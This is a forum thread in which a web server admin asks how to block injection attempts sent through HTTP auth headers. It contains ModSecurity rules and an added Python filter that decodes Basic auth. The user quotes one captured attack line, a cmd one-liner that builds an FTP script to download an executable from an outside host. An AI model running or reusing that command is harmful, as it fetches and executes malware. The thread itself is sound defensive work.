Filtering Hack Attempts Via HTTP Auth

Discussion in 'Install/Configuration' started by kule, Feb 4, 2011.

  1. kule

    kule New Member

    Is there a way I can filter attempts to hack via HTTP auth? I'm getting HTTP auth requests which are trying to use SQL injection with the login/username.

    It's not getting anywhere, but I would like to stop the request before it reaches the application if possible. I tried using SecFilter but that doesn't seem to stop it (I assume that it's just looking at the actual request string rather than the HTTP auth details).

    EDIT: Apologies, feel free to move this into General. I didn't mean to put this in Features/Feedback.
  2. mistwang

    mistwang LiteSpeed Staff

    What SecFilter rule did you use? It should work; it can match a pattern against any HTTP request header.
  3. kule

    kule New Member

    I was using

    SecFilter "rewetsr"

    This is the command that was coming through (after a load of unicode characters):

    cmd /c echo open 1.1.1.1 21 > o&echo user 1 1 >> o &echo get rewetsr.exe >> o &echo quit >> o &ftp -n -s'
  4. mistwang

    mistwang LiteSpeed Staff

    Use SecFilterSelective or the new "SecRule" directive.
  5. kule

    kule New Member

    Ok so if I read this right something like:

    SecRule REMOTE_USER "rewetsr" log,deny,status:403
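
An added example, not part of the thread and not LiteSpeed's or ModSecurity's code: with the HTTP Basic scheme the `username:password` pair travels base64-encoded in the `Authorization` header, so a filter has to decode that header before a literal pattern such as `rewetsr` can match. The sketch below assumes Basic auth; the function names, deny patterns and sample headers are constructed for illustration.

```python
import base64
import binascii
import re

# Constructed deny patterns: the marker string from the thread and the
# "cmd /c" prefix of the logged command. Tune these for your own traffic.
DENY_PATTERNS = [re.compile(r"rewetsr", re.I), re.compile(r"cmd\s*/c", re.I)]


def make_header(user, password):
    """Build a Basic Authorization header value (used for the samples only)."""
    token = base64.b64encode(f"{user}:{password}".encode("latin-1"))
    return "Basic " + token.decode("ascii")


def decode_basic_credentials(header_value):
    """Return (username, password), or None if not well-formed Basic auth."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None
    # latin-1 maps every byte, so unusual bytes stay available for matching.
    user, sep, password = raw.decode("latin-1").partition(":")
    return (user, password) if sep else None


def should_block(header_value):
    """True if decoded credentials hit a deny pattern, or if the header
    claims Basic auth but cannot be decoded (a policy choice made here)."""
    creds = decode_basic_credentials(header_value)
    if creds is None:
        return header_value.strip().lower().startswith("basic")
    return any(p.search(field) for p in DENY_PATTERNS for field in creds)


# Constructed sample headers, not taken from real traffic.
SAMPLE_HEADERS = {
    "benign": make_header("alice", "s3cret"),
    "probe": make_header("x' OR 1=1; get rewetsr.exe", "x"),
}

if __name__ == "__main__":
    for name, value in SAMPLE_HEADERS.items():
        literal_hit = "rewetsr" in value  # what a raw string match would see
        print(name, "raw match:", literal_hit, "block:", should_block(value))
```

Matching the pattern against the raw header value of the `probe` sample finds nothing, while the decoded username does match.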
